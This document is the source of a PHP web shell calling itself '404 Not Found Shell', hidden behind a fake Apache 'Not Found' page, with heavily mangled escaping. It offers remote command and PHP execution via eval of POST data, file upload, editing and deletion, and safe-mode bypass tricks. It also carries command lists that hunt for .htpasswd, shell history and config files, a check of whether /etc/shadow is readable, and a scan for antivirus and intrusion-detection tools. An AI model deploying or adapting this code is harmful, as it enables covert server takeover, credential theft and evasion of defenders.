Not Found

The requested URL was not found on this server.


Apache Server at Port 80
\\\"dir\\\", \\\"Find index.php in current dir\\\" => \\\"dir /s /w /b index.php\\\", \\\"Find *config*.php in current dir\\\" => \\\"dir /s /w /b *config*.php\\\", \\\"Show active connections\\\" => \\\"netstat -an\\\", \\\"Show running services\\\" => \\\"net start\\\", \\\"User accounts\\\" => \\\"net user\\\", \\\"Show computers\\\" => \\\"net view\\\", \\\"ARP Table\\\" => \\\"arp -a\\\", \\\"IP Configuration\\\" => \\\"ipconfig /all\\\" ); else $aliases = array( \\\"List dir\\\" => \\\"ls -la\\\", \\\"list file attributes on a Linux second extended file system\\\" => \\\"lsattr -va\\\", \\\"show opened ports\\\" => \\\"netstat -an | grep -i listen\\\", \\\"Find\\\" => \\\"\\\", \\\"find all suid files\\\" => \\\"find / -type f -perm -04000 -ls\\\", \\\"find suid files in current dir\\\" => \\\"find . -type f -perm -04000 -ls\\\", \\\"find all sgid files\\\" => \\\"find / -type f -perm -02000 -ls\\\", \\\"find sgid files in current dir\\\" => \\\"find . -type f -perm -02000 -ls\\\", \\\"find config.inc.php files\\\" => \\\"find / -type f -name config.inc.php\\\", \\\"find config* files\\\" => \\\"find / -type f -name \\\\\\\"config*\\\\\\\"\\\", \\\"find config* files in current dir\\\" => \\\"find . -type f -name \\\\\\\"config*\\\\\\\"\\\", \\\"find all writable folders and files\\\" => \\\"find / -perm -2 -ls\\\", \\\"find all writable folders and files in current dir\\\" => \\\"find . -perm -2 -ls\\\", \\\"find all service.pwd files\\\" => \\\"find / -type f -name service.pwd\\\", \\\"find service.pwd files in current dir\\\" => \\\"find . -type f -name service.pwd\\\", \\\"find all .htpasswd files\\\" => \\\"find / -type f -name .htpasswd\\\", \\\"find .htpasswd files in current dir\\\" => \\\"find . -type f -name .htpasswd\\\", \\\"find all .bash_history files\\\" => \\\"find / -type f -name .bash_history\\\", \\\"find .bash_history files in current dir\\\" => \\\"find . -type f -name .bash_history\\\", \\\"find all .fetchmailrc files\\\" => \\\"find / -type f -name .fetchmailrc\\\", \\\"find .fetchmailrc files in current dir\\\" => \\\"find . -type f -name .fetchmailrc\\\", \\\"Locate\\\" => \\\"\\\", \\\"locate httpd.conf files\\\" => \\\"locate httpd.conf\\\", \\\"locate vhosts.conf files\\\" => \\\"locate vhosts.conf\\\", \\\"locate proftpd.conf files\\\" => \\\"locate proftpd.conf\\\", \\\"locate psybnc.conf files\\\" => \\\"locate psybnc.conf\\\", \\\"locate my.conf files\\\" => \\\"locate my.conf\\\", \\\"locate admin.php files\\\" =>\\\"locate admin.php\\\", \\\"locate cfg.php files\\\" => \\\"locate cfg.php\\\", \\\"locate conf.php files\\\" => \\\"locate conf.php\\\", \\\"locate config.dat files\\\" => \\\"locate config.dat\\\", \\\"locate config.php files\\\" => \\\"locate config.php\\\", \\\"locate config.inc files\\\" => \\\"locate config.inc\\\", \\\"locate config.inc.php\\\" => \\\"locate config.inc.php\\\", \\\"locate config.default.php files\\\" => \\\"locate config.default.php\\\", \\\"locate config* files \\\" => \\\"locate config\\\", \\\"locate .conf files\\\"=>\\\"locate \\\'.conf\\\'\\\", \\\"locate .pwd files\\\" => \\\"locate \\\'.pwd\\\'\\\", \\\"locate .sql files\\\" => \\\"locate \\\'.sql\\\'\\\", \\\"locate .htpasswd files\\\" => \\\"locate \\\'.htpasswd\\\'\\\", \\\"locate .bash_history files\\\" => \\\"locate \\\'.bash_history\\\'\\\", \\\"locate .mysql_history files\\\" => \\\"locate \\\'.mysql_history\\\'\\\", \\\"locate .fetchmailrc files\\\" => \\\"locate \\\'.fetchmailrc\\\'\\\", \\\"locate backup files\\\" => \\\"locate backup\\\", \\\"locate dump files\\\" => \\\"locate dump\\\", \\\"locate priv files\\\" => \\\"locate priv\\\" ); function printHeader() { if(empty($_POST[\\\'charset\\\'])) $_POST[\\\'charset\\\'] = \\\"UTF-8\\\"; global $color; ?> \\\'><?=$_SERVER[\\\'HTTP_HOST\\\']?>- 404 Not Found Shell V.<?=VERSION?>
\\\'> \\\'> \\\'> \\\'> \\\'> \\\'>
\\\".$path[$i].\\\"/\\\"; } $charsets = array(\\\'UTF-8\\\', \\\'Windows-1251\\\', \\\'KOI8-R\\\', \\\'KOI8-U\\\', \\\'cp866\\\'); $opt_charsets = \\\'\\\'; foreach($charsets as $item) $opt_charsets .= \\\'\\\'; $m = array(\\\'Sec. Info\\\'=>\\\'SecInfo\\\',\\\'Files\\\'=>\\\'FilesMan\\\',\\\'Console\\\'=>\\\'Console\\\',\\\'Sql\\\'=>\\\'Sql\\\',\\\'Php\\\'=>\\\'Php\\\',\\\'Safe mode\\\'=>\\\'SafeMode\\\',\\\'String tools\\\'=>\\\'StringTools\\\',\\\'Bruteforce\\\'=>\\\'Bruteforce\\\',\\\'Network\\\'=>\\\'Network\\\'); if(!empty($GLOBALS[\\\'auth_pass\\\'])) $m[\\\'Logout\\\'] = \\\'Logout\\\'; $m[\\\'Self remove\\\'] = \\\'SelfRemove\\\'; $menu = \\\'\\\'; foreach($m as $k => $v) $menu .= \\\'[ \\\'.$k.\\\' ]\\\'; $drives = \\\"\\\"; if ($GLOBALS[\\\'os\\\'] == \\\'win\\\') { foreach( range(\\\'a\\\',\\\'z\\\') as $drive ) if (is_dir($drive.\\\':\\\\\\\\\\\')) $drives .= \\\'[ \\\'.$drive.\\\' ] \\\'; } echo \\\'\\\'. \\\'\\\'. \\\'
Uname
User
Php
Hdd
Cwd\\\'.($GLOBALS[\\\'os\\\'] == \\\'win\\\'?\\\'
Drives\\\':\\\'\\\').\\\'
:\\\'.substr(@php_uname(), 0, 120).\\\' [Google] [milw0rm]
:\\\'.$uid.\\\' ( \\\'.$user.\\\' ) Group: \\\'.$gid.\\\' ( \\\'.$group.\\\' )
:\\\'.@phpversion().\\\' Safe mode: \\\'.($GLOBALS[\\\'safe_mode\\\']?\\\'ON\\\':\\\'OFF\\\').\\\' [ phpinfo ] Datetime: \\\'.date(\\\'Y-m-d H:i:s\\\').\\\'
:\\\'.viewSize($totalSpace).\\\' Free: \\\'.viewSize($freeSpace).\\\' (\\\'.(int)($freeSpace/$totalSpace*100).\\\'%)
:\\\'.$cwd_links.\\\' \\\'.viewPermsColor($GLOBALS[\\\'cwd\\\']).\\\' [ home ]
:\\\'.$drives.\\\'

Server IP:
\\\'.gethostbyname($_SERVER[\\\"HTTP_HOST\\\"]).\\\'
Client IP:
\\\'.$_SERVER[\\\'REMOTE_ADDR\\\'].\\\'
\\\'. \\\'\\\'.$menu.\\\'
\\\'; } function printFooter() { $is_writable = is_writable($GLOBALS[\\\'cwd\\\'])?\\\"[ Writeable ]\\\":\\\"[ Not writable ]\\\"; ?>
Change dir:
\\\">>\\\">
Read file:
>\\\">
Make dir:
>\\\">
Make file:
>\\\">
Execute:
>\\\">
\\\'> \\\'> Upload file:
>\\\">
= 1073741824) return sprintf(\\\'%1.2f\\\', $s / 1073741824 ). \\\' GB\\\'; elseif($s >= 1048576) return sprintf(\\\'%1.2f\\\', $s / 1048576 ) . \\\' MB\\\'; elseif($s >= 1024) return sprintf(\\\'%1.2f\\\', $s / 1024 ) . \\\' KB\\\'; else return $s . \\\' B\\\'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \\\'s\\\'; elseif (($p & 0xA000) == 0xA000)$i = \\\'l\\\'; elseif (($p & 0x8000) == 0x8000)$i = \\\'-\\\'; elseif (($p & 0x6000) == 0x6000)$i = \\\'b\\\'; elseif (($p & 0x4000) == 0x4000)$i = \\\'d\\\'; elseif (($p & 0x2000) == 0x2000)$i = \\\'c\\\'; elseif (($p & 0x1000) == 0x1000)$i = \\\'p\\\'; else $i = \\\'u\\\'; $i .= (($p & 0x0100) ? \\\'r\\\' : \\\'-\\\'); $i .= (($p & 0x0080) ? \\\'w\\\' : \\\'-\\\'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? \\\'s\\\' : \\\'x\\\' ) : (($p & 0x0800) ? \\\'S\\\' : \\\'-\\\')); $i .= (($p & 0x0020) ? \\\'r\\\' : \\\'-\\\'); $i .= (($p & 0x0010) ? \\\'w\\\' : \\\'-\\\'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? \\\'s\\\' : \\\'x\\\' ) : (($p & 0x0400) ? \\\'S\\\' : \\\'-\\\')); $i .= (($p & 0x0004) ? \\\'r\\\' : \\\'-\\\'); $i .= (($p & 0x0002) ? \\\'w\\\' : \\\'-\\\'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? \\\'t\\\' : \\\'x\\\' ) : (($p & 0x0200) ? \\\'T\\\' : \\\'-\\\')); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return \\\'\\\'.perms(@fileperms($f)).\\\'\\\'; elseif (!@is_writable($f)) return \\\'\\\'.perms(@fileperms($f)).\\\'\\\'; else return \\\'\\\'.perms(@fileperms($f)).\\\'\\\'; } if(!function_exists(\\\"scandir\\\")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } function which($p) { $path = ex(\\\'which \\\'.$p); if(!empty($path)) return $path; return false; } function actionSecInfo() { printHeader(); echo \\\'

Server security information

\\\'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo \\\'\\\'.$n.\\\': \\\'; if(strpos($v, \\\"\\\\n\\\") === false) echo $v.\\\'
\\\'; else echo \\\'
\\\'.$v.\\\'
\\\'; } } showSecParam(\\\'Server software\\\', @getenv(\\\'SERVER_SOFTWARE\\\')); showSecParam(\\\'Disabled PHP Functions\\\', ($GLOBALS[\\\'disable_functions\\\'])?$GLOBALS[\\\'disable_functions\\\']:\\\'none\\\'); showSecParam(\\\'Open base dir\\\', @ini_get(\\\'open_basedir\\\')); showSecParam(\\\'Safe mode exec dir\\\', @ini_get(\\\'safe_mode_exec_dir\\\')); showSecParam(\\\'Safe mode include dir\\\', @ini_get(\\\'safe_mode_include_dir\\\')); showSecParam(\\\'cURL support\\\', function_exists(\\\'curl_version\\\')?\\\'enabled\\\':\\\'no\\\'); $temp=array(); if(function_exists(\\\'mysql_get_client_info\\\')) $temp[] = \\\"MySql (\\\".mysql_get_client_info().\\\")\\\"; if(function_exists(\\\'mssql_connect\\\')) $temp[] = \\\"MSSQL\\\"; if(function_exists(\\\'pg_connect\\\')) $temp[] = \\\"PostgreSQL\\\"; if(function_exists(\\\'oci_connect\\\')) $temp[] = \\\"Oracle\\\"; showSecParam(\\\'Supported databases\\\', implode(\\\', \\\', $temp)); echo \\\'
\\\'; if( $GLOBALS[\\\'os\\\'] == \\\'nix\\\' ) { $userful = array(\\\'gcc\\\',\\\'lcc\\\',\\\'cc\\\',\\\'ld\\\',\\\'make\\\',\\\'php\\\',\\\'perl\\\',\\\'python\\\',\\\'ruby\\\',\\\'tar\\\',\\\'gzip\\\',\\\'bzip\\\',\\\'bzip2\\\',\\\'nc\\\',\\\'locate\\\',\\\'suidperl\\\'); $danger = array(\\\'kav\\\',\\\'nod32\\\',\\\'bdcored\\\',\\\'uvscan\\\',\\\'sav\\\',\\\'drwebd\\\',\\\'clamd\\\',\\\'rkhunter\\\',\\\'chkrootkit\\\',\\\'iptables\\\',\\\'ipfw\\\',\\\'tripwire\\\',\\\'shieldcc\\\',\\\'portsentry\\\',\\\'snort\\\',\\\'ossec\\\',\\\'lidsadm\\\',\\\'tcplodg\\\',\\\'sxid\\\',\\\'logcheck\\\',\\\'logwatch\\\',\\\'sysmask\\\',\\\'zmbscap\\\',\\\'sawmill\\\',\\\'wormscan\\\',\\\'ninja\\\'); $downloaders = array(\\\'wget\\\',\\\'fetch\\\',\\\'lynx\\\',\\\'links\\\',\\\'curl\\\',\\\'get\\\',\\\'lwp-mirror\\\'); showSecParam(\\\'Readable /etc/passwd\\\', @is_readable(\\\'/etc/passwd\\\')?\\\"yes [view]\\\":\\\'no\\\'); showSecParam(\\\'Readable /etc/shadow\\\', @is_readable(\\\'/etc/shadow\\\')?\\\"yes [view]\\\":\\\'no\\\'); showSecParam(\\\'OS version\\\', @file_get_contents(\\\'/proc/version\\\')); showSecParam(\\\'Distr name\\\', @file_get_contents(\\\'/etc/issue.net\\\')); if(!$GLOBALS[\\\'safe_mode\\\']) { echo \\\'
\\\'; $temp=array(); foreach ($userful as $item) if(which($item)){$temp[]=$item;} showSecParam(\\\'Userful\\\', implode(\\\', \\\',$temp)); $temp=array(); foreach ($danger as $item) if(which($item)){$temp[]=$item;} showSecParam(\\\'Danger\\\', implode(\\\', \\\',$temp)); $temp=array(); foreach ($downloaders as $item) if(which($item)){$temp[]=$item;} showSecParam(\\\'Downloaders\\\', implode(\\\', \\\',$temp)); echo \\\'
\\\'; showSecParam(\\\'Hosts\\\', @file_get_contents(\\\'/etc/hosts\\\')); showSecParam(\\\'HDD space\\\', ex(\\\'df -h\\\')); showSecParam(\\\'Mount options\\\', @file_get_contents(\\\'/etc/fstab\\\')); } } else { showSecParam(\\\'OS Version\\\',ex(\\\'ver\\\')); showSecParam(\\\'Account Settings\\\',ex(\\\'net accounts\\\')); showSecParam(\\\'User Accounts\\\',ex(\\\'net user\\\')); } echo \\\'
\\\'; printFooter(); } function actionPhp() { if( isset($_POST[\\\'ajax\\\']) ) { $_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\']).\\\'ajax\\\'] = true; ob_start(); eval($_POST[\\\'p1\\\']); $temp = \\\"document.getElementById(\\\'PhpOutput\\\').style.display=\\\'\\\';document.getElementById(\\\'PhpOutput\\\').innerHTML=\\\'\\\".addcslashes(htmlspecialchars(ob_get_clean()),\\\"\\\\n\\\\r\\\\t\\\\\\\\\\\'\\\\0\\\").\\\"\\\';\\\\n\\\"; echo strlen($temp), \\\"\\\\n\\\", $temp; exit; } printHeader(); if( isset($_POST[\\\'p2\\\']) && ($_POST[\\\'p2\\\'] == \\\'info\\\') ) { echo \\\'

PHP info

\\\'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(\\\'!body {.*}!msiU\\\',\\\'\\\',$tmp); $tmp = preg_replace(\\\'!a:\\\\w+ {.*}!msiU\\\',\\\'\\\',$tmp); $tmp = preg_replace(\\\'!h1!msiU\\\',\\\'h2\\\',$tmp); $tmp = preg_replace(\\\'!td, th {(.*)}!msiU\\\',\\\'.e, .v, .h, .h th {$1}\\\',$tmp); $tmp = preg_replace(\\\'!body, td, th, h2, h2 {.*}!msiU\\\',\\\'\\\',$tmp); echo $tmp; echo \\\'

\\\'; } if(empty($_POST[\\\'ajax\\\'])&&!empty($_POST[\\\'p1\\\'])) $_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\']).\\\'ajax\\\'] = false; echo \\\'

Execution PHP-code

\\\'; echo \\\' send using AJAX
\\\'; 
    if(!empty($_POST[\\\'p1\\\'])) { 
        ob_start(); 
        eval($_POST[\\\'p1\\\']); 
        echo htmlspecialchars(ob_get_clean()); 
    } 
    echo \\\'
\\\'; printFooter(); } function actionFilesMan() { printHeader(); echo \\\'

File manager

\\\'; if(isset($_POST[\\\'p1\\\'])) { switch($_POST[\\\'p1\\\']) { case \\\'uploadFile\\\': if(!@move_uploaded_file($_FILES[\\\'f\\\'][\\\'tmp_name\\\'], $_FILES[\\\'f\\\'][\\\'name\\\'])) echo \\\"Can\\\'t upload file!\\\"; break; break; case \\\'mkdir\\\': if(!@mkdir($_POST[\\\'p2\\\'])) echo \\\"Can\\\'t create new dir\\\"; break; case \\\'delete\\\': function deleteDir($path) { $path = (substr($path,-1)==\\\'/\\\') ? $path:$path.\\\'/\\\'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == \\\"..\\\") || (basename($item) == \\\".\\\") ) continue; $type = filetype($item); if ($type == \\\"dir\\\") deleteDir($item); else @unlink($item); } closedir($dh); rmdir($path); } if(is_array(@$_POST[\\\'f\\\'])) foreach($_POST[\\\'f\\\'] as $f) { $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case \\\'paste\\\': if($_SESSION[\\\'act\\\'] == \\\'copy\\\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = opendir($c.$s); while (($f = readdir($h)) !== false) if (($f != \\\".\\\") and ($f != \\\"..\\\")) { copy_paste($c.$s.\\\'/\\\',$f, $d.$s.\\\'/\\\'); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION[\\\'f\\\'] as $f) copy_paste($_SESSION[\\\'cwd\\\'],$f, $GLOBALS[\\\'cwd\\\']); } elseif($_SESSION[\\\'act\\\'] == \\\'move\\\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = opendir($c.$s); while (($f = readdir($h)) !== false) if (($f != \\\".\\\") and ($f != \\\"..\\\")) { copy_paste($c.$s.\\\'/\\\',$f, $d.$s.\\\'/\\\'); } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s); } } foreach($_SESSION[\\\'f\\\'] as $f) @rename($_SESSION[\\\'cwd\\\'].$f, $GLOBALS[\\\'cwd\\\'].$f); } unset($_SESSION[\\\'f\\\']); break; default: if(!empty($_POST[\\\'p1\\\']) && (($_POST[\\\'p1\\\'] == \\\'copy\\\')||($_POST[\\\'p1\\\'] == \\\'move\\\')) ) { $_SESSION[\\\'act\\\'] = @$_POST[\\\'p1\\\']; $_SESSION[\\\'f\\\'] = @$_POST[\\\'f\\\']; foreach($_SESSION[\\\'f\\\'] as $k => $f) $_SESSION[\\\'f\\\'][$k] = urldecode($f); $_SESSION[\\\'cwd\\\'] = @$_POST[\\\'c\\\']; } break; } echo \\\'\\\'; } $dirContent = @scandir(isset($_POST[\\\'c\\\'])?$_POST[\\\'c\\\']:$GLOBALS[\\\'cwd\\\']); if($dirContent === false) { echo \\\'Can\\\\\\\'t open this folder!\\\'; return; } global $sort; $sort = array(\\\'name\\\', 1); if(!empty($_POST[\\\'p1\\\'])) { if(preg_match(\\\'!s_([A-z]+)_(\\\\d{1})!\\\', $_POST[\\\'p1\\\'], $match)) $sort = array($match[1], (int)$match[2]); } ?> \\\"; $dirs = $files = $links = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array(\\\'name\\\' => $dirContent[$i], \\\'path\\\' => $GLOBALS[\\\'cwd\\\'].$dirContent[$i], \\\'modify\\\' => date(\\\'Y-m-d H:i:s\\\',@filemtime($GLOBALS[\\\'cwd\\\'].$dirContent[$i])), \\\'perms\\\' => viewPermsColor($GLOBALS[\\\'cwd\\\'].$dirContent[$i]), \\\'size\\\' => @filesize($GLOBALS[\\\'cwd\\\'].$dirContent[$i]), \\\'owner\\\' => $ow[\\\'name\\\']?$ow[\\\'name\\\']:@fileowner($dirContent[$i]), \\\'group\\\' => $gr[\\\'name\\\']?$gr[\\\'name\\\']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS[\\\'cwd\\\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\\\'type\\\' => \\\'file\\\')); elseif(@is_link($GLOBALS[\\\'cwd\\\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\\\'type\\\' => \\\'link\\\')); elseif(@is_dir($GLOBALS[\\\'cwd\\\'].$dirContent[$i])&& ($dirContent[$i] != \\\".\\\")) $dirs[] = array_merge($tmp, array(\\\'type\\\' => \\\'dir\\\')); } $GLOBALS[\\\'sort\\\'] = $sort; function cmp($a, $b) { if($GLOBALS[\\\'sort\\\'][0] != \\\'size\\\') return strcmp($a[$GLOBALS[\\\'sort\\\'][0]], $b[$GLOBALS[\\\'sort\\\'][0]])*($GLOBALS[\\\'sort\\\'][1]?1:-1); else return (($a[\\\'size\\\'] < $b[\\\'size\\\']) ? -1 : 1)*($GLOBALS[\\\'sort\\\'][1]?1:-1); } usort($files, \\\"cmp\\\"); usort($dirs, \\\"cmp\\\"); usort($links, \\\"cmp\\\"); $files = array_merge($dirs, $links, $files); $l = 0; foreach($files as $f) { echo \\\'\\\'; $l = $l?0:1; } ?>
NameSizeModifyOwner/GroupPermissionsActions
\\\'.htmlspecialchars($f[\\\'name\\\']):\\\'g(\\\\\\\'FilesMan\\\\\\\',\\\\\\\'\\\'.$f[\\\'path\\\'].\\\'\\\\\\\');\\\">[ \\\'.htmlspecialchars($f[\\\'name\\\']).\\\' ]\\\').\\\'\\\'.(($f[\\\'type\\\']==\\\'file\\\')?viewSize($f[\\\'size\\\']):$f[\\\'type\\\']).\\\'\\\'.$f[\\\'modify\\\'].\\\'\\\'.$f[\\\'owner\\\'].\\\'/\\\'.$f[\\\'group\\\'].\\\'\\\'.$f[\\\'perms\\\'] .\\\'R T\\\'.(($f[\\\'type\\\']==\\\'file\\\')?\\\' E D\\\':\\\'\\\').\\\'
\\\'> \\\'>  >\\\">
String conversions
\\\'; $stringTools = array( \\\'Base64 encode\\\' => \\\'base64_encode\\\', \\\'Base64 decode\\\' => \\\'base64_decode\\\', \\\'Url encode\\\' => \\\'urlencode\\\', \\\'Url decode\\\' => \\\'urldecode\\\', \\\'Full urlencode\\\' => \\\'full_urlencode\\\', \\\'md5 hash\\\' => \\\'md5\\\', \\\'sha1 hash\\\' => \\\'sha1\\\', \\\'crypt\\\' => \\\'crypt\\\', \\\'CRC32\\\' => \\\'crc32\\\', \\\'ASCII to HEX\\\' => \\\'ascii2hex\\\', \\\'HEX to ASCII\\\' => \\\'hex2ascii\\\', \\\'HEX to DEC\\\' => \\\'hexdec\\\', \\\'HEX to BIN\\\' => \\\'hex2bin\\\', \\\'DEC to HEX\\\' => \\\'dechex\\\', \\\'DEC to BIN\\\' => \\\'decbin\\\', \\\'BIN to HEX\\\' => \\\'bin2hex\\\', \\\'BIN to DEC\\\' => \\\'bindec\\\', \\\'String to lower case\\\' => \\\'strtolower\\\', \\\'String to upper case\\\' => \\\'strtoupper\\\', \\\'Htmlspecialchars\\\' => \\\'htmlspecialchars\\\', \\\'String length\\\' => \\\'strlen\\\', ); if(empty($_POST[\\\'ajax\\\'])&&!empty($_POST[\\\'p1\\\'])) $_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\']).\\\'ajax\\\'] = false; echo \\\"
>\\\'/> send using AJAX
\\\"; 
    if(!empty($_POST[\\\'p1\\\'])) { 
        if(function_exists($_POST[\\\'p1\\\'])) 
        echo htmlspecialchars($_POST[\\\'p1\\\']($_POST[\\\'p2\\\'])); 
    } 
    echo\\\"
\\\"; ?>

Search for hash:







File tools
\\\'; if( !file_exists(@$_POST[\\\'p1\\\']) ) { echo \\\'File not exists\\\'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST[\\\'p1\\\'])); $gid = @posix_getgrgid(@fileowner($_POST[\\\'p1\\\'])); echo \\\'Name: \\\'.htmlspecialchars($_POST[\\\'p1\\\']).\\\' Size: \\\'.(is_file($_POST[\\\'p1\\\'])?viewSize(filesize($_POST[\\\'p1\\\'])):\\\'-\\\').\\\' Permission: \\\'.viewPermsColor($_POST[\\\'p1\\\']).\\\' Owner/Group: \\\'.$uid[\\\'name\\\'].\\\'/\\\'.$gid[\\\'name\\\'].\\\'
\\\'; echo \\\'Create time: \\\'.date(\\\'Y-m-d H:i:s\\\',filectime($_POST[\\\'p1\\\'])).\\\' Access time: \\\'.date(\\\'Y-m-d H:i:s\\\',fileatime($_POST[\\\'p1\\\'])).\\\' Modify time: \\\'.date(\\\'Y-m-d H:i:s\\\',filemtime($_POST[\\\'p1\\\'])).\\\'

\\\'; if( empty($_POST[\\\'p2\\\']) ) $_POST[\\\'p2\\\'] = \\\'view\\\'; if( is_file($_POST[\\\'p1\\\']) ) $m = array(\\\'View\\\', \\\'Highlight\\\', \\\'Download\\\', \\\'Hexdump\\\', \\\'Edit\\\', \\\'Chmod\\\', \\\'Rename\\\', \\\'Touch\\\'); else $m = array(\\\'Chmod\\\', \\\'Rename\\\', \\\'Touch\\\'); foreach($m as $v) echo \\\'\\\'.((strtolower($v)==@$_POST[\\\'p2\\\'])?\\\'[ \\\'.$v.\\\' ]\\\':$v).\\\' \\\'; echo \\\'

\\\'; switch($_POST[\\\'p2\\\']) { case \\\'view\\\': echo \\\'
\\\'; 
            $fp = @fopen($_POST[\\\'p1\\\'], \\\'r\\\'); 
            if($fp) { 
                while( !@feof($fp) ) 
                    echo htmlspecialchars(@fread($fp, 1024)); 
                @fclose($fp); 
            } 
            echo \\\'
\\\'; break; case \\\'highlight\\\': if( is_readable($_POST[\\\'p1\\\']) ) { echo \\\'
\\\'; $code = highlight_file($_POST[\\\'p1\\\'],true); echo str_replace(array(\\\'\\\'), array(\\\'\\\'),$code).\\\'
\\\'; } break; case \\\'chmod\\\': if( !empty($_POST[\\\'p3\\\']) ) { $perms = 0; for($i=strlen($_POST[\\\'p3\\\'])-1;$i>=0;--$i) $perms += (int)$_POST[\\\'p3\\\'][$i]*pow(8, (strlen($_POST[\\\'p3\\\'])-$i-1)); if(!@chmod($_POST[\\\'p1\\\'], $perms)) echo \\\'Can\\\\\\\'t set permissions!
\\\'; else die(\\\'\\\'); } echo \\\'
>\\\">
\\\'; break; case \\\'edit\\\': if( !is_writable($_POST[\\\'p1\\\'])) { echo \\\'File isn\\\\\\\'t writeable\\\'; break; } if( !empty($_POST[\\\'p3\\\']) ) { @file_put_contents($_POST[\\\'p1\\\'],$_POST[\\\'p3\\\']); echo \\\'Saved!
\\\'; } echo \\\'
>\\\">
\\\'; break; case \\\'hexdump\\\': $c = @file_get_contents($_POST[\\\'p1\\\']); $n = 0; $h = array(\\\'00000000
\\\',\\\'\\\',\\\'\\\'); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf(\\\'%02X\\\',ord($c[$i])).\\\' \\\'; switch ( ord($c[$i]) ) { case 0: $h[2] .= \\\' \\\'; break; case 9: $h[2] .= \\\' \\\'; break; case 10: $h[2] .= \\\' \\\'; break; case 13: $h[2] .= \\\' \\\'; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf(\\\'%08X\\\',$i+1).\\\'
\\\';} $h[1] .= \\\'
\\\'; $h[2] .= \\\"\\\\n\\\"; } } echo \\\'
\\\'.$h[0].\\\'
\\\'.$h[1].\\\'
\\\'.htmlspecialchars($h[2]).\\\'
\\\'; break; case \\\'rename\\\': if( !empty($_POST[\\\'p3\\\']) ) { if(!@rename($_POST[\\\'p1\\\'], $_POST[\\\'p3\\\'])) echo \\\'Can\\\\\\\'t rename!
\\\'; else die(\\\'\\\'); } echo \\\'
>\\\">
\\\'; break; case \\\'touch\\\': if( !empty($_POST[\\\'p3\\\']) ) { $time = strtotime($_POST[\\\'p3\\\']); if($time) { if(@touch($_POST[\\\'p1\\\'],$time,$time)) die(\\\'\\\'); else { echo \\\'Fail!\\\'; } } else echo \\\'Bad time format!\\\'; } echo \\\'
>\\\">
\\\'; break; case \\\'mkfile\\\': break; } echo \\\'
\\\'; printFooter(); } function actionSafeMode() { $temp=\\\'\\\'; ob_start(); switch($_POST[\\\'p1\\\']) { case 1: $temp=@tempnam($test, \\\'cx\\\'); if(@copy(\\\"compress.zlib://\\\".$_POST[\\\'p2\\\'], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo \\\'Sorry... Can\\\\\\\'t open file\\\'; break; case 2: $files = glob($_POST[\\\'p2\\\'].\\\'*\\\'); if( is_array($files) ) foreach ($files as $filename) echo $filename.\\\"\\\\n\\\"; break; case 3: $ch = curl_init(\\\"file://\\\".$_POST[\\\'p2\\\'].\\\"\\\\x00\\\".SELF_PATH); curl_exec($ch); break; case 4: ini_restore(\\\"safe_mode\\\"); ini_restore(\\\"open_basedir\\\"); include($_POST[\\\'p2\\\']); break; case 5: for(;$_POST[\\\'p2\\\'] <= $_POST[\\\'p3\\\'];$_POST[\\\'p2\\\']++) { $uid = @posix_getpwuid($_POST[\\\'p2\\\']); if ($uid) echo join(\\\':\\\',$uid).\\\"\\\\n\\\"; } break; case 6: if(!function_exists(\\\'imap_open\\\'))break; $stream = imap_open($_POST[\\\'p2\\\'], \\\"\\\", \\\"\\\"); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); printHeader(); echo \\\'

Safe mode bypass

\\\'; echo \\\'Copy (read file)
>\\\">

Glob (list dir)
>\\\">

Curl (read file)
>\\\">

Ini_restore (read file)
>\\\">

Posix_getpwuid (\\\"Read\\\" /etc/passwd)
From
To
>\\\">

Imap_open (read file)
>\\\">
\\\'; if($temp) echo \\\'
\\\'.$temp.\\\'
\\\'; echo \\\'
\\\'; printFooter(); } function actionConsole() { if(isset($_POST[\\\'ajax\\\'])) { $_SESSION[md5($_SERVER[\\\'HTTP_HOST\\\']).\\\'ajax\\\'] = true; ob_start(); echo \\\"document.cf.cmd.value=\\\'\\\';\\\\n\\\"; $temp = @iconv($_POST[\\\'charset\\\'], \\\'UTF-8\\\', addcslashes(\\\"\\\\n$ \\\".$_POST[\\\'p1\\\'].\\\"\\\\n\\\".ex($_POST[\\\'p1\\\']),\\\"\\\\n\\\\r\\\\t\\\\\\\\\\\'\\\\0\\\")); if(preg_match(\\\"!.*cd\\\\s+([^;]+)$!\\\",$_POST[\\\'p1\\\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\\\'cwd\\\'] = @getcwd(); echo \\\"document.mf.c.value=\\\'\\\".$GLOBALS[\\\'cwd\\\'].\\\"\\\';\\\"; } } echo \\\"document.cf.output.value+=\\\'\\\".$temp.\\\"\\\';\\\"; echo \\\"document.cf.output.scrollTop = document.cf.output.scrollHeight;\\\"; $temp = ob_get_clean(); echo strlen($temp), \\\"\\\\n\\\", $temp; exit; } printHeader(); ?> Console
